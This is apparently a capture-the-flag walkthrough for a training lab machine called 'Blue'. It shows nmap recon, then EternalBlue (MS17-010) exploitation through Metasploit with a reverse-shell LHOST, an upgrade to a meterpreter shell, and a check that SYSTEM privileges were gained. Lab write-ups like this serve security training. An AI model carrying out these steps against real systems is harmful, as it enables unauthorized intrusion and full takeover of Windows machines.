# Offensive Security Path - Blue

## Task 1 : Scan the machine - Recon

Run `nmap -sC -sV -oN <ip>`

![blue](img/blue.png)
How many ports are open with a port number under 1000? `3` 
The open ports under 1000 are `135,139,445`

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Run `nmap --script=vuln <ip>`

![blue2](/img/blue2.png)

Answer: `ms17-010`. This vuln was Revealed by the ShadowBrokers, exploits an issue within SMBv1

# Task 2

Start Metasploit by running `msfconsole`

Run `search ms17-010`
![blue3](/img/blue3.png)

Answer: `exploit/windows/smb/ms17_010_eternalblue`


Show options and set the one required value. What is the name of this value? (All caps for submission)

Run `use 2` 
Run `show options`

![BLUE4](/img/BLUE4.png)
Answer: `RHOSTS`

Set the payload and exploit

run `set LHOST <your THM VPN IP>`

![blue5](/img/blue5.png)


If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? 
`post/multi/manage/shell_to_meterpreter`

Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

`SESSION`

Run the session by the command `sessions <sessionsID>`

![blue6](/img/blue6.png)


Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. 

![blue7](/img/blue7.png)

Press CTRL+Z to background the windows shell
